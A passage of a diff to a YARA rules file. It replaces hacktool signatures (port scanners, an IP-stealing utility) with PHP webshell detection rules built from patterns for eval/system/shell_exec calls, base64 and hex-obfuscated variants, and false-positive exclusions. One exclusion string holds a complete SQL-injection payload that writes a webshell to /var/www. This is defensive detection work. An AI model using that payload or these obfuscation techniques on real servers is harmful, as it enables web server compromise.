-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L204-L217"
+		description = "php webshell containing base64 encoded payload"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4e42b47d-725b-5e1f-9408-6c6329f60506"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L720-L870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "376304acdd0b0251c8b19fea20bb6f5b"
-		logic_hash = "248f437964fc6f7836f6b4c87e1f35bb1bac25a1a484cdf1a4065e7efb823b51"
+		hash = "88d0d4696c9cb2d37d16e330e236cb37cfaec4cd"
+		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
+		hash = "e726cd071915534761822805724c6c6bfe0fcac604a86f09437f03f301512dc5"
+		hash = "39b8871928d00c7de8d950d25bff4cb19bf9bd35942f7fee6e0f397ff42fbaee"
+		hash = "8cc9802769ede56f1139abeaa0735526f781dff3b6c6334795d1d0f19161d076"
+		hash = "4cda0c798908b61ae7f4146c6218d7b7de14cbcd7c839edbdeb547b5ae404cd4"
+		hash = "afd9c9b0df0b2ca119914ea0008fad94de3bd93c6919f226b793464d4441bdf4"
+		hash = "b2048dc30fc7681094a0306a81f4a4cc34f0b35ccce1258c20f4940300397819"
+		hash = "da6af9a4a60e3a484764010fbf1a547c2c0a2791e03fc11618b8fc2605dceb04"
+		hash = "222cd9b208bd24955bcf4f9976f9c14c1d25e29d361d9dcd603d57f1ea2b0aee"
+		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
+		hash = "6b6cd1ef7e78e37cbcca94bfb5f49f763ba2f63ed8b33bc4d7f9e5314c87f646"
+		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
+		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
+		hash = "e2b1dfcfaa61e92526a3a444be6c65330a8db4e692543a421e19711760f6ffe2"
+		logic_hash = "8f606dc3e1e688cca144fe769af50980b4c25fa69b08c67aca8c676a6a060010"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 17
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Description|"
-		$s3 = "soft Visual Studio\\VB9yp"
-		$s4 = "adj_fptan?4"
-		$s7 = "DOWS\\SyMem32\\/o"
+		$decode1 = "base64_decode" fullword nocase wide ascii
+		$decode2 = "openssl_decrypt" fullword nocase wide ascii
+		$one1 = "leGVj"
+		$one2 = "V4ZW"
+		$one3 = "ZXhlY"
+		$one4 = "UAeABlAGMA"
+		$one5 = "lAHgAZQBjA"
+		$one6 = "ZQB4AGUAYw"
+		$two1 = "zaGVsbF9leGVj"
+		$two2 = "NoZWxsX2V4ZW"
+		$two3 = "c2hlbGxfZXhlY"
+		$two4 = "MAaABlAGwAbABfAGUAeABlAGMA"
+		$two5 = "zAGgAZQBsAGwAXwBlAHgAZQBjA"
+		$two6 = "cwBoAGUAbABsAF8AZQB4AGUAYw"
+		$three1 = "wYXNzdGhyd"
+		$three2 = "Bhc3N0aHJ1"
+		$three3 = "cGFzc3Rocn"
+		$three4 = "AAYQBzAHMAdABoAHIAdQ"
+		$three5 = "wAGEAcwBzAHQAaAByAHUA"
+		$three6 = "cABhAHMAcwB0AGgAcgB1A"
+		$four1 = "zeXN0ZW"
+		$four2 = "N5c3Rlb"
+		$four3 = "c3lzdGVt"
+		$four4 = "MAeQBzAHQAZQBtA"
+		$four5 = "zAHkAcwB0AGUAbQ"
+		$four6 = "cwB5AHMAdABlAG0A"
+		$five1 = "wb3Blb"
+		$five2 = "BvcGVu"
+		$five3 = "cG9wZW"
+		$five4 = "AAbwBwAGUAbg"
+		$five5 = "wAG8AcABlAG4A"
+		$five6 = "cABvAHAAZQBuA"
+		$six1 = "wcm9jX29wZW"
+		$six2 = "Byb2Nfb3Blb"
+		$six3 = "cHJvY19vcGVu"
+		$six4 = "AAcgBvAGMAXwBvAHAAZQBuA"
+		$six5 = "wAHIAbwBjAF8AbwBwAGUAbg"
+		$six6 = "cAByAG8AYwBfAG8AcABlAG4A"
+		$seven1 = "wY250bF9leGVj"
+		$seven2 = "BjbnRsX2V4ZW"
+		$seven3 = "cGNudGxfZXhlY"
+		$seven4 = "AAYwBuAHQAbABfAGUAeABlAGMA"
+		$seven5 = "wAGMAbgB0AGwAXwBlAHgAZQBjA"
+		$seven6 = "cABjAG4AdABsAF8AZQB4AGUAYw"
+		$eight1 = "ldmFs"
+		$eight2 = "V2YW"
+		$eight3 = "ZXZhb"
+		$eight4 = "UAdgBhAGwA"
+		$eight5 = "lAHYAYQBsA"
+		$eight6 = "ZQB2AGEAbA"
+		$nine1 = "hc3Nlcn"
+		$nine2 = "Fzc2Vyd"
+		$nine3 = "YXNzZXJ0"
+		$nine4 = "EAcwBzAGUAcgB0A"
+		$nine5 = "hAHMAcwBlAHIAdA"
+		$nine6 = "YQBzAHMAZQByAHQA"
+		$execu1 = "leGVjd"
+		$execu2 = "V4ZWN1"
+		$execu3 = "ZXhlY3"
+		$esystem1 = "lc3lzdGVt"
+		$esystem2 = "VzeXN0ZW"
+		$esystem3 = "ZXN5c3Rlb"
+		$opening1 = "vcGVuaW5n"
+		$opening2 = "9wZW5pbm"
+		$opening3 = "b3BlbmluZ"
+		$fp1 = { D0 CF 11 E0 A1 B1 1A E1 }
+		$fp2 = "YXBpLnRlbGVncmFtLm9"
+		$fp3 = " GET /"
+		$fp4 = " POST /"
+		$fpa1 = "/cn=Recipients"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not any of ( $fp* ) and any of ( $decode* ) and ( ( any of ( $one* ) and not any of ( $execu* ) ) or any of ( $two* ) or any of ( $three* ) or ( any of ( $four* ) and not any of ( $esystem* ) ) or ( any of ( $five* ) and not any of ( $opening* ) ) or any of ( $six* ) or any of ( $seven* ) or any of ( $eight* ) or any of ( $nine* ) )
 }
-rule SIGNATURE_BASE_Netbios_Name_Scanner
+rule SIGNATURE_BASE_WEBSHELL_PHP_Unknown_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "03716e00-a969-5ab5-9be7-e8fc4272e40f"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L219-L231"
+		description = "obfuscated php webshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "93d01a4c-4c18-55d2-b682-68a1f6460889"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L872-L894"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
-		logic_hash = "19b40a283b74317fece2f5be0ee3e38227d9631eebbc7efb0ea19056b52630f1"
+		hash = "12ce6c7167b33cc4e8bdec29fb1cfc44ac9487d1"
+		hash = "cf4abbd568ce0c0dfce1f2e4af669ad2"
+		logic_hash = "ce2d4c87c001a45febf7eac5474aa0d24ea73067f9154203ef5653bf77e7028f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "IconEx"
-		$s2 = "soft Visual Stu"
-		$s4 = "NBTScanner!y&"
+		$sp0 = /^<\?php \$[a-z]{3,30} = '/ wide ascii
+		$sp1 = "=explode(chr(" wide ascii
+		$sp2 = "; if (!function_exists('" wide ascii
+		$sp3 = " = NULL; for(" wide ascii
 
 	condition:
-		all of them
+		filesize < 300KB and all of ( $sp* )
 }
-rule SIGNATURE_BASE_Felikspack3___Scanners_Ipscan
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Eval : FILE
 {
 	meta:
-		description = "Auto-generated rule on file ipscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "8360b268-3434-5142-9248-40b7a1589be9"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L233-L245"
+		description = "Generic PHP webshell which uses any eval/exec function in the same line with user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "79cfbd88-f6f7-5cba-a325-0a99962139ca"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L896-L955"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
-		logic_hash = "8da10a4536ecea889f29bb3f098518580629bf48eda88db7adfc5f61738ede25"
+		hash = "a61437a427062756e2221bfb6d58cd62439d09d9"
+		hash = "90c5cc724ec9cf838e4229e5e08955eec4d7bf95"
+		hash = "2b41abc43c5b6c791d4031005bf7c5104a98e98a00ee24620ce3e8e09a78e78f"
+		hash = "5c68a0fa132216213b66a114375b07b08dc0cb729ddcf0a29bff9ca7a22eaaf4"
+		hash = "de3c01f55d5346577922bbf449faaaaa1c8d1aaa64c01e8a1ee8c9d99a41a1be"
+		hash = "124065176d262bde397b1911648cea16a8ff6a4c8ab072168d12bf0662590543"
+		hash = "cd7450f3e5103e68741fd086df221982454fbcb067e93b9cbd8572aead8f319b"
+		hash = "ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521"
+		hash = "31ff9920d401d4fbd5656a4f06c52f1f54258bc42332fc9456265dca7bb4c1ea"
+		hash = "64e6c08aa0b542481b86a91cdf1f50c9e88104a8a4572a8c6bd312a9daeba60e"
+		hash = "80e98e8a3461d7ba15d869b0641cdd21dd5b957a2006c3caeaf6f70a749ca4bb"
+		hash = "93982b8df76080e7ba4520ae4b4db7f3c867f005b3c2f84cb9dff0386e361c35"
+		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
+		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
+		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
+		hash = "fd5f0f81204ca6ca6e93343500400d5853012e88254874fc9f62efe0fde7ab3c"
+		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
+		hash = "6d042b6393669bb4d98213091cabe554ab192a6c916e86c04d06cc2a4ca92c00"
+		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
+		logic_hash = "4b7759e4761f5897bfb5e576df645a2e99cec4e703fb28d0fc275cf8f8848263"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s2 = "WCAP;}ECTED"
-		$s4 = "NotSupported"
-		$s6 = "SCAN.VERSION{_"
+		$geval = /\b(exec|shell_exec|passthru|system|popen|proc_open|pcntl_exec|eval|assert)[\t ]{0,300}(\(base64_decode)?(\(stripslashes)?[\t ]{0,300}(\(trim)?[\t ]{0,300}\(\$(_POST|_GET|_REQUEST|_SERVER\s?\[['"]HTTP_|GLOBALS\[['"]_(POST|GET|REQUEST))/ wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$gfp_3 = " GET /"
+		$gfp_4 = " POST /"
 
 	condition:
-		all of them
+		filesize < 300KB and not ( any of ( $gfp* ) ) and $geval
 }
-rule SIGNATURE_BASE_Cgisscan_Cgiscan
+rule SIGNATURE_BASE_WEBSHELL_PHP_Double_Eval_Tiny : FILE
 {
 	meta:
-		description = "Auto-generated rule on file CGIScan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "60bd5038-a308-55fd-85bb-2c4183f1c951"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L247-L259"
+		description = "PHP webshell which probably hides the input inside an eval()ed obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "868db363-83d3-57e2-ac8d-c6125e9bdd64"
+		date = "2021-01-11"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L957-L1008"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "338820e4e8e7c943074d5a5bc832458a"
-		logic_hash = "5bd856a77c53616cf78d093462f8b7ca5a5fb0924406a02941d86bdb015a1fbc"
+		hash = "f66fb918751acc7b88a17272a044b5242797976c73a6e54ac6b04b02f61e9761"
+		hash = "6b2f0a3bd80019dea536ddbf92df36ab897dd295840cb15bb7b159d0ee2106ff"
+		hash = "aabfd179aaf716929c8b820eefa3c1f613f8dcac"
+		hash = "9780c70bd1c76425d4313ca7a9b89dda77d2c664"
+		hash = "006620d2a701de73d995fc950691665c0692af11"
+		logic_hash = "cf0405e8a44497574d75291bf86bf9413d9a64140e820f7f5a655fe5302c6918"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 42
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s1 = "Wang Products" fullword wide
-		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
-		$s3 = "tcp is the only protocol supported thru socks server"
+		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
+		$fp1 = "clone" fullword wide ascii
+		$fp2 = "* @assert" ascii
+		$fp3 = "*@assert" ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of ( $s* )
+		filesize > 70 and filesize < 300 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and #payload >= 2 and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_IP_Stealing_Utilities
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC : FILE
 {
 	meta:
-		description = "Auto-generated rule on file IP Stealing Utilities.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "3a947e9c-d707-5819-88f2-059585750048"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L261-L272"
+		description = "PHP webshell obfuscated"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f66e337b-8478-5cd3-b01a-81133edaa8e5"
+		date = "2021-01-12"
+		modified = "2024-03-11"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1010-L1136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
-		logic_hash = "38958edeee6e140e11267cdd7899ad517799dbce33ac267d51dea0f8aecfa1ee"
+		hash = "eec9ac58a1e763f5ea0f7fa249f1fe752047fa60"
+		hash = "181a71c99a4ae13ebd5c94bfc41f9ec534acf61cd33ef5bce5fb2a6f48b65bf4"
+		hash = "76d4e67e13c21662c4b30aab701ce9cdecc8698696979e504c288f20de92aee7"
+		hash = "1d0643927f04cb1133f00aa6c5fa84aaf88e5cf14d7df8291615b402e8ab6dc2"
+		logic_hash = "8d7150a4fc657efe3526d5f8f624a66e7186a3f42b4605cc349bd31deeb71b7f"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = -23
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "DarkKnight"
-		$s9 = "IPStealerUtilities"
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$o1 = "chr(" nocase wide ascii
+		$o2 = "chr (" nocase wide ascii
+		$o3 = "goto" fullword nocase wide ascii
+		$o4 = "\\x9" wide ascii
+		$o5 = "\\x3" wide ascii
+		$o6 = "\\61" wide ascii
+		$o7 = "\\44" wide ascii
+		$o8 = "\\112" wide ascii
+		$o9 = "\\120" wide ascii
+		$fp1 = "$goto" wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
 
 	condition:
-		all of them
+		not ( any of ( $gfp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( not $fp1 and ( ( filesize < 20KB and ( ( #o1 + #o2 ) > 50 or #o3 > 10 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 200KB and ( ( #o1 + #o2 ) > 200 or #o3 > 30 or ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 30 ) ) ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) )
 }
-rule SIGNATURE_BASE_Superscan4
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded : FILE
 {
 	meta:
-		description = "Auto-generated rule on file SuperScan4.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "bd353382-ffa2-56c5-b842-1ffc94d6849e"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L274-L287"
+		description = "PHP webshell obfuscated by encoding"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "134c1189-1b41-58d5-af66-beaa4795a704"
+		date = "2021-04-18"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1138-L1189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "78f76428ede30e555044b83c47bc86f0"
-		logic_hash = "7f76c59e85efac5c150f783606e2a9bdc8724c6afd9f9c6405d63f7467c72752"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "119fc058c9c5285498a47aa271ac9a27f6ada1bf4d854ccd4b01db993d61fc52"
+		hash = "d5ca3e4505ea122019ea263d6433221030b3f64460d3ce2c7d0d63ed91162175"
+		hash = "8a1e2d72c82f6a846ec066d249bfa0aaf392c65149d39b7b15ba19f9adc3b339"
+		logic_hash = "c2a88e48374f949fcc9c14b773f7709c96b3147d1982ae9721708474ee5a3dcd"
+		score = 70
+		quality = -64
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s2 = " td class=\"summO1\">"
-		$s6 = "REM'EBAqRISE"
-		$s7 = "CorExitProcess'msc#e"
+		$enc_eval1 = /(e|\\x65|\\101)(\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
+		$enc_eval2 = /(\\x65|\\101)(v|\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ wide ascii nocase
+		$enc_assert1 = /(a|\\97|\\x61)(\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
+		$enc_assert2 = /(\\97|\\x61)(s|\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ wide ascii nocase
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		all of them
+		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $enc* )
 }
-rule SIGNATURE_BASE_Portracer
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC_Encoded_Mixed_Dec_And_Hex : FILE
 {
 	meta:
-		description = "Auto-generated rule on file PortRacer.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "54717938-2f4c-5442-b0ad-40b9acd1101a"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L288-L300"
+		description = "PHP webshell obfuscated by encoding of mixed hex and dec"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9ae920e2-17c8-58fd-8566-90d461a54943"
+		date = "2021-04-18"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1191-L1247"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2834a872a0a8da5b1be5db65dfdef388"
-		logic_hash = "f6ad85a8970b10e25becca76e17bff30cbc787ed45f331af4ecf9563ff11b65d"
+		hash = "0e21931b16f30b1db90a27eafabccc91abd757fa63594ba8a6ad3f477de1ab1c"
+		hash = "929975272f0f42bf76469ed89ebf37efcbd91c6f8dac1129c7ab061e2564dd06"
+		hash = "88fce6c1b589d600b4295528d3fcac161b581f739095b99cd6c768b7e16e89ff"
+		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
+		hash = "50389c3b95a9de00220fc554258fda1fef01c62dad849e66c8a92fc749523457"
+		hash = "c4ab4319a77b751a45391aa01cde2d765b095b0e3f6a92b0b8626d5c7e3ad603"
+		hash = "df381f04fca2522e2ecba0f5de3f73a655d1540e1cf865970f5fa3bf52d2b297"
+		hash = "401388d8b97649672d101bf55694dd175375214386253d0b4b8d8d801a89549c"
+		hash = "99fc39a12856cc1a42bb7f90ffc9fe0a5339838b54a63e8f00aa98961c900618"
+		hash = "fb031af7aa459ee88a9ca44013a76f6278ad5846aa20e5add4aeb5fab058d0ee"
+		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
+		hash = "0ff05e6695074f98b0dee6200697a997c509a652f746d2c1c92c0b0a0552ca47"
+		logic_hash = "d9b4d224d43915cf08050c173627b314c3e41a30ecfffe28038281eadc114e51"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 17
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Auto Scroll BOTH Text Boxes"
-		$s4 = "Start/Stop Portscanning"
-		$s6 = "Auto Save LogFile by pressing STOP"
